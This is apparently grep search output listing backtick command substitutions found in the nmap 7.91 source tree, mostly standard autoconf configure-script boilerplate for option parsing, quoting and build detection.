nmap-7.91+dfsg1/nping/configure:198:  test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1
nmap-7.91+dfsg1/nping/configure-199-test \$(( 1 + 1 )) = 2 || exit 1"
##############################################
nmap-7.91+dfsg1/nping/configure-324-      case $as_dir in #(
nmap-7.91+dfsg1/nping/configure:325:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/nping/configure-326-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/nping/configure-397-  {
nmap-7.91+dfsg1/nping/configure:398:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/nping/configure-399-  }
##############################################
nmap-7.91+dfsg1/nping/configure-404-# ----------------------------------------
nmap-7.91+dfsg1/nping/configure:405:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/nping/configure-406-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/nping/configure-467-  eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" &&
nmap-7.91+dfsg1/nping/configure:468:  test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || {
nmap-7.91+dfsg1/nping/configure-469-  # Blame Lee E. McMahon (1931-1989) for sed's syntax.  :-)
##############################################
nmap-7.91+dfsg1/nping/configure-787-  case $ac_option in
nmap-7.91+dfsg1/nping/configure:788:  *=?*) ac_optarg=`expr "X$ac_option" : '[^=]*=\(.*\)'` ;;
nmap-7.91+dfsg1/nping/configure-789-  *=)   ac_optarg= ;;
##############################################
nmap-7.91+dfsg1/nping/configure-831-  -disable-* | --disable-*)
nmap-7.91+dfsg1/nping/configure:832:    ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'`
nmap-7.91+dfsg1/nping/configure-833-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nping/configure-836-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nping/configure:837:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nping/configure-838-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nping/configure-857-  -enable-* | --enable-*)
nmap-7.91+dfsg1/nping/configure:858:    ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'`
nmap-7.91+dfsg1/nping/configure-859-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nping/configure-862-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nping/configure:863:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nping/configure-864-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nping/configure-1070-  -with-* | --with-*)
nmap-7.91+dfsg1/nping/configure:1071:    ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'`
nmap-7.91+dfsg1/nping/configure-1072-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nping/configure-1075-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nping/configure:1076:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nping/configure-1077-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nping/configure-1086-  -without-* | --without-*)
nmap-7.91+dfsg1/nping/configure:1087:    ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'`
nmap-7.91+dfsg1/nping/configure-1088-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nping/configure-1091-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/nping/configure:1092:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/nping/configure-1093-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/nping/configure-1124-  *=*)
nmap-7.91+dfsg1/nping/configure:1125:    ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='`
nmap-7.91+dfsg1/nping/configure-1126-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/nping/configure-1145-if test -n "$ac_prev"; then
nmap-7.91+dfsg1/nping/configure:1146:  ac_option=--`echo $ac_prev | sed 's/_/-/g'`
nmap-7.91+dfsg1/nping/configure-1147-  as_fn_error $? "missing argument to $ac_option"
##############################################
nmap-7.91+dfsg1/nping/configure-1167-    */ )
nmap-7.91+dfsg1/nping/configure:1168:      ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'`
nmap-7.91+dfsg1/nping/configure-1169-      eval $ac_var=\$ac_val;;
##############################################
nmap-7.91+dfsg1/nping/configure-1202-ac_ls_di=`ls -di .` &&
nmap-7.91+dfsg1/nping/configure:1203:ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` ||
nmap-7.91+dfsg1/nping/configure-1204-  as_fn_error $? "working directory cannot be determined"
##############################################
nmap-7.91+dfsg1/nping/configure-1258-case $srcdir in
nmap-7.91+dfsg1/nping/configure:1259:*/) srcdir=`expr "X$srcdir" : 'X\(.*[^/]\)' \| "X$srcdir" : 'X\(.*\)'`;;
nmap-7.91+dfsg1/nping/configure-1260-esac
##############################################
nmap-7.91+dfsg1/nping/configure-1301-By default, \`make install' will install all the files in
nmap-7.91+dfsg1/nping/configure:1302:\`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc.  You can specify
nmap-7.91+dfsg1/nping/configure:1303:an installation prefix other than \`$ac_default_prefix' using \`--prefix',
nmap-7.91+dfsg1/nping/configure-1304-for instance \`--prefix=\$HOME'.
##############################################
nmap-7.91+dfsg1/nping/configure-1386-*)
nmap-7.91+dfsg1/nping/configure:1387:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/nping/configure-1388-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/nping/configure:1389:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/nping/configure-1390-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/nping/configure-1840-  as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack
nmap-7.91+dfsg1/nping/configure:1841:  as_decl_name=`echo $2|sed 's/ *(.*//'`
nmap-7.91+dfsg1/nping/configure:1842:  as_decl_use=`echo $2|sed -e 's/(/((/' -e 's/)/) 0&/' -e 's/,/) 0& (/g'`
nmap-7.91+dfsg1/nping/configure-1843-  { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $as_decl_name is declared" >&5
##############################################
nmap-7.91+dfsg1/nping/configure-1954-    *\'*)
nmap-7.91+dfsg1/nping/configure:1955:      ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nping/configure-1956-    esac
##############################################
nmap-7.91+dfsg1/nping/configure-2037-      case $ac_val in
nmap-7.91+dfsg1/nping/configure:2038:      *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/nping/configure-2039-      esac
##############################################
nmap-7.91+dfsg1/nping/configure-2052-	case $ac_val in
nmap-7.91+dfsg1/nping/configure:2053:	*\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/nping/configure-2054-	esac
##############################################
nmap-7.91+dfsg1/nping/configure-2172-    set,)
nmap-7.91+dfsg1/nping/configure:2173:      { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5
nmap-7.91+dfsg1/nping/configure:2174:$as_echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;}
nmap-7.91+dfsg1/nping/configure-2175-      ac_cache_corrupted=: ;;
##############################################
nmap-7.91+dfsg1/nping/configure-2183-	# differences in whitespace do not lead to failure.
nmap-7.91+dfsg1/nping/configure:2184:	ac_old_val_w=`echo x $ac_old_val`
nmap-7.91+dfsg1/nping/configure:2185:	ac_new_val_w=`echo x $ac_new_val`
nmap-7.91+dfsg1/nping/configure-2186-	if test "$ac_old_val_w" != "$ac_new_val_w"; then
##############################################
nmap-7.91+dfsg1/nping/configure-2203-    case $ac_new_val in
nmap-7.91+dfsg1/nping/configure:2204:    *\'*) ac_arg=$ac_var=`$as_echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nping/configure-2205-    *) ac_arg=$ac_var=$ac_new_val ;;
##############################################
nmap-7.91+dfsg1/nping/configure-2319-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/nping/configure:2320:  ac_build_alias=`$SHELL "$ac_aux_dir/config.guess"`
nmap-7.91+dfsg1/nping/configure-2321-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/nping/configure-2322-  as_fn_error $? "cannot guess build type; you must specify one" "$LINENO" 5
nmap-7.91+dfsg1/nping/configure:2323:ac_cv_build=`$SHELL "$ac_aux_dir/config.sub" $ac_build_alias` ||
nmap-7.91+dfsg1/nping/configure-2324-  as_fn_error $? "$SHELL $ac_aux_dir/config.sub $ac_build_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/nping/configure-2343-IFS=$ac_save_IFS
nmap-7.91+dfsg1/nping/configure:2344:case $build_os in *\ *) build_os=`echo "$build_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/nping/configure-2345-
##############################################
nmap-7.91+dfsg1/nping/configure-2354-else
nmap-7.91+dfsg1/nping/configure:2355:  ac_cv_host=`$SHELL "$ac_aux_dir/config.sub" $host_alias` ||
nmap-7.91+dfsg1/nping/configure-2356-    as_fn_error $? "$SHELL $ac_aux_dir/config.sub $host_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/nping/configure-2376-IFS=$ac_save_IFS
nmap-7.91+dfsg1/nping/configure:2377:case $host_os in *\ *) host_os=`echo "$host_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/nping/configure-2378-
##############################################
nmap-7.91+dfsg1/nping/configure-2725-$as_echo_n "checking whether the C compiler works... " >&6; }
nmap-7.91+dfsg1/nping/configure:2726:ac_link_default=`$as_echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'`
nmap-7.91+dfsg1/nping/configure-2727-
##############################################
nmap-7.91+dfsg1/nping/configure-2769-	then :; else
nmap-7.91+dfsg1/nping/configure:2770:	   ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/nping/configure-2771-	fi
##############################################
nmap-7.91+dfsg1/nping/configure-2829-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;;
nmap-7.91+dfsg1/nping/configure:2830:    *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/nping/configure-2831-	  break;;
##############################################
nmap-7.91+dfsg1/nping/configure-2938-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;;
nmap-7.91+dfsg1/nping/configure:2939:    *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'`
nmap-7.91+dfsg1/nping/configure-2940-       break;;
##############################################
nmap-7.91+dfsg1/nping/configure-4120-  nping_gcc_major_version=0
nmap-7.91+dfsg1/nping/configure:4121:  case `$our_gcc --version | sed -e 's,\..*,.,' -e q` in
nmap-7.91+dfsg1/nping/configure-4122-    *4.)
##############################################
nmap-7.91+dfsg1/nping/configure-4457-  # Check for GNU $ac_path_GREP
nmap-7.91+dfsg1/nping/configure:4458:case `"$ac_path_GREP" --version 2>&1` in
nmap-7.91+dfsg1/nping/configure-4459-*GNU*)
##############################################
nmap-7.91+dfsg1/nping/configure-4523-  # Check for GNU $ac_path_EGREP
nmap-7.91+dfsg1/nping/configure:4524:case `"$ac_path_EGREP" --version 2>&1` in
nmap-7.91+dfsg1/nping/configure-4525-*GNU*)
##############################################
nmap-7.91+dfsg1/nping/configure-4684-do :
nmap-7.91+dfsg1/nping/configure:4685:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/nping/configure-4686-ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default
##############################################
nmap-7.91+dfsg1/nping/configure-4689-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nping/configure:4690:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nping/configure-4691-_ACEOF
##############################################
nmap-7.91+dfsg1/nping/configure-4699-do :
nmap-7.91+dfsg1/nping/configure:4700:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/nping/configure-4701-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/nping/configure-4703-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nping/configure:4704:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nping/configure-4705-_ACEOF
##############################################
nmap-7.91+dfsg1/nping/configure-5243-do :
nmap-7.91+dfsg1/nping/configure:5244:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/nping/configure-5245-ac_fn_c_check_header_mongrel "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default"
##############################################
nmap-7.91+dfsg1/nping/configure-5247-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/nping/configure:5248:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/nping/configure-5249-_ACEOF
##############################################
nmap-7.91+dfsg1/nping/configure-6387-  ac_script='s/\$U\././;s/\.o$//;s/\.obj$//'
nmap-7.91+dfsg1/nping/configure:6388:  ac_i=`$as_echo "$ac_i" | sed "$ac_script"`
nmap-7.91+dfsg1/nping/configure-6389-  # 2. Prepend LIBOBJDIR.  When used with automake>=1.10 LIBOBJDIR
##############################################
nmap-7.91+dfsg1/nping/configure-6455-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/nping/configure:6456:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nping/configure-6457-  as_echo='print -r --'
nmap-7.91+dfsg1/nping/configure-6458-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/nping/configure:6459:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/nping/configure-6460-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/nping/configure-6462-else
nmap-7.91+dfsg1/nping/configure:6463:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/nping/configure-6464-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/nping/configure-6472-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/nping/configure:6473:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/nping/configure-6474-      esac;
##############################################
nmap-7.91+dfsg1/nping/configure-6549-# ----------------------------------------
nmap-7.91+dfsg1/nping/configure:6550:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/nping/configure-6551-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/nping/configure-6621-  {
nmap-7.91+dfsg1/nping/configure:6622:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/nping/configure-6623-  }
##############################################
nmap-7.91+dfsg1/nping/configure-6725-      case $as_dir in #(
nmap-7.91+dfsg1/nping/configure:6726:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/nping/configure-6727-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/nping/configure-6856-cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1
nmap-7.91+dfsg1/nping/configure:6857:ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`"
nmap-7.91+dfsg1/nping/configure-6858-ac_cs_version="\\
##############################################
nmap-7.91+dfsg1/nping/configure-6879-  --*=?*)
nmap-7.91+dfsg1/nping/configure:6880:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/nping/configure:6881:    ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'`
nmap-7.91+dfsg1/nping/configure-6882-    ac_shift=:
##############################################
nmap-7.91+dfsg1/nping/configure-6884-  --*=)
nmap-7.91+dfsg1/nping/configure:6885:    ac_option=`expr "X$1" : 'X\([^=]*\)='`
nmap-7.91+dfsg1/nping/configure-6886-    ac_optarg=
##############################################
nmap-7.91+dfsg1/nping/configure-6908-    case $ac_optarg in
nmap-7.91+dfsg1/nping/configure:6909:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nping/configure-6910-    '') as_fn_error $? "missing file argument" ;;
##############################################
nmap-7.91+dfsg1/nping/configure-6916-    case $ac_optarg in
nmap-7.91+dfsg1/nping/configure:6917:    *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nping/configure-6918-    esac
##############################################
nmap-7.91+dfsg1/nping/configure-7037-fi
nmap-7.91+dfsg1/nping/configure:7038:ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' </dev/null 2>/dev/null`
nmap-7.91+dfsg1/nping/configure-7039-if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then
##############################################
nmap-7.91+dfsg1/nping/configure-7054-  as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5
nmap-7.91+dfsg1/nping/configure:7055:ac_delim_num=`echo "$ac_subst_vars" | grep -c '^'`
nmap-7.91+dfsg1/nping/configure-7056-ac_delim='%!_!# '
##############################################
nmap-7.91+dfsg1/nping/configure-7060-
nmap-7.91+dfsg1/nping/configure:7061:  ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X`
nmap-7.91+dfsg1/nping/configure-7062-  if test $ac_delim_n = $ac_delim_num; then
##############################################
nmap-7.91+dfsg1/nping/configure-7198-for ac_last_try in false false :; do
nmap-7.91+dfsg1/nping/configure:7199:  ac_tt=`sed -n "/$ac_delim/p" confdefs.h`
nmap-7.91+dfsg1/nping/configure-7200-  if test -z "$ac_tt"; then
##############################################
nmap-7.91+dfsg1/nping/configure-7330-      esac
nmap-7.91+dfsg1/nping/configure:7331:      case $ac_f in *\'*) ac_f=`$as_echo "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac
nmap-7.91+dfsg1/nping/configure-7332-      as_fn_append ac_file_inputs " '$ac_f'"
##############################################
nmap-7.91+dfsg1/nping/configure-7389-*)
nmap-7.91+dfsg1/nping/configure:7390:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/nping/configure-7391-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/nping/configure:7392:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/nping/configure-7393-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/nping/configure-7445-/@mandir@/p'
nmap-7.91+dfsg1/nping/configure:7446:case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in
nmap-7.91+dfsg1/nping/configure-7447-*datarootdir*) ac_datarootdir_seen=yes;;
##############################################
nmap-7.91+dfsg1/nping/configure-7462-
nmap-7.91+dfsg1/nping/configure:7463:# Neutralize VPATH when `$srcdir' = `.'.
nmap-7.91+dfsg1/nping/configure-7464-# Shell code in configure.ac might set extrasub.
##############################################
nmap-7.91+dfsg1/nping/configure-7489-test -z "$ac_datarootdir_hack$ac_datarootdir_seen" &&
nmap-7.91+dfsg1/nping/configure:7490:  { ac_out=`sed -n '/\${datarootdir}/p' "$ac_tmp/out"`; test -n "$ac_out"; } &&
nmap-7.91+dfsg1/nping/configure-7491-  { ac_out=`sed -n '/^[	 ]*datarootdir[	 ]*:*=/p' \
##############################################
nmap-7.91+dfsg1/nping/configure-7603-      case $ac_arg in
nmap-7.91+dfsg1/nping/configure:7604:      *\'*) ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nping/configure-7605-      esac
##############################################
nmap-7.91+dfsg1/nping/configure-7613-  case $ac_arg in
nmap-7.91+dfsg1/nping/configure:7614:  *\'*) ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/nping/configure-7615-  esac
##############################################
nmap-7.91+dfsg1/nping/configure-7642-*)
nmap-7.91+dfsg1/nping/configure:7643:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/nping/configure-7644-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/nping/configure:7645:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/nping/configure-7646-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/nping/utils_net.cc-1154-        dstlen = sizeof(dst);
nmap-7.91+dfsg1/nping/utils_net.cc:1155:        target->getTargetSockAddr(&dst, &dstlen);
nmap-7.91+dfsg1/nping/utils_net.cc-1156-        assert(dst.ss_family == AF_INET);
##############################################
nmap-7.91+dfsg1/configure-43-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/configure:44:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/configure-45-  as_echo='print -r --'
nmap-7.91+dfsg1/configure-46-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/configure:47:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/configure-48-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/configure-50-else
nmap-7.91+dfsg1/configure:51:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/configure-52-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/configure-60-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/configure:61:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/configure-62-      esac;
##############################################
nmap-7.91+dfsg1/configure-197-  eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" &&
nmap-7.91+dfsg1/configure:198:  test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1
nmap-7.91+dfsg1/configure-199-test \$(( 1 + 1 )) = 2 || exit 1"
##############################################
nmap-7.91+dfsg1/configure-324-      case $as_dir in #(
nmap-7.91+dfsg1/configure:325:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/configure-326-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/configure-397-  {
nmap-7.91+dfsg1/configure:398:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/configure-399-  }
##############################################
nmap-7.91+dfsg1/configure-404-# ----------------------------------------
nmap-7.91+dfsg1/configure:405:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/configure-406-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/configure-467-  eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" &&
nmap-7.91+dfsg1/configure:468:  test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || {
nmap-7.91+dfsg1/configure-469-  # Blame Lee E. McMahon (1931-1989) for sed's syntax.  :-)
##############################################
nmap-7.91+dfsg1/configure-880-  case $ac_option in
nmap-7.91+dfsg1/configure:881:  *=?*) ac_optarg=`expr "X$ac_option" : '[^=]*=\(.*\)'` ;;
nmap-7.91+dfsg1/configure-882-  *=)   ac_optarg= ;;
##############################################
nmap-7.91+dfsg1/configure-924-  -disable-* | --disable-*)
nmap-7.91+dfsg1/configure:925:    ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'`
nmap-7.91+dfsg1/configure-926-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/configure-929-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/configure:930:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/configure-931-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/configure-950-  -enable-* | --enable-*)
nmap-7.91+dfsg1/configure:951:    ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'`
nmap-7.91+dfsg1/configure-952-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/configure-955-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/configure:956:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/configure-957-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/configure-1163-  -with-* | --with-*)
nmap-7.91+dfsg1/configure:1164:    ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'`
nmap-7.91+dfsg1/configure-1165-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/configure-1168-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/configure:1169:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/configure-1170-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/configure-1179-  -without-* | --without-*)
nmap-7.91+dfsg1/configure:1180:    ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'`
nmap-7.91+dfsg1/configure-1181-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/configure-1184-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/configure:1185:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/configure-1186-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/configure-1217-  *=*)
nmap-7.91+dfsg1/configure:1218:    ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='`
nmap-7.91+dfsg1/configure-1219-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/configure-1238-if test -n "$ac_prev"; then
nmap-7.91+dfsg1/configure:1239:  ac_option=--`echo $ac_prev | sed 's/_/-/g'`
nmap-7.91+dfsg1/configure-1240-  as_fn_error $? "missing argument to $ac_option"
##############################################
nmap-7.91+dfsg1/configure-1260-    */ )
nmap-7.91+dfsg1/configure:1261:      ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'`
nmap-7.91+dfsg1/configure-1262-      eval $ac_var=\$ac_val;;
##############################################
nmap-7.91+dfsg1/configure-1295-ac_ls_di=`ls -di .` &&
nmap-7.91+dfsg1/configure:1296:ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` ||
nmap-7.91+dfsg1/configure-1297-  as_fn_error $? "working directory cannot be determined"
##############################################
nmap-7.91+dfsg1/configure-1351-case $srcdir in
nmap-7.91+dfsg1/configure:1352:*/) srcdir=`expr "X$srcdir" : 'X\(.*[^/]\)' \| "X$srcdir" : 'X\(.*\)'`;;
nmap-7.91+dfsg1/configure-1353-esac
##############################################
nmap-7.91+dfsg1/configure-1394-By default, \`make install' will install all the files in
nmap-7.91+dfsg1/configure:1395:\`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc.  You can specify
nmap-7.91+dfsg1/configure:1396:an installation prefix other than \`$ac_default_prefix' using \`--prefix',
nmap-7.91+dfsg1/configure-1397-for instance \`--prefix=\$HOME'.
##############################################
nmap-7.91+dfsg1/configure-1512-*)
nmap-7.91+dfsg1/configure:1513:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/configure-1514-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/configure:1515:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/configure-1516-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/configure-1899-  as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack
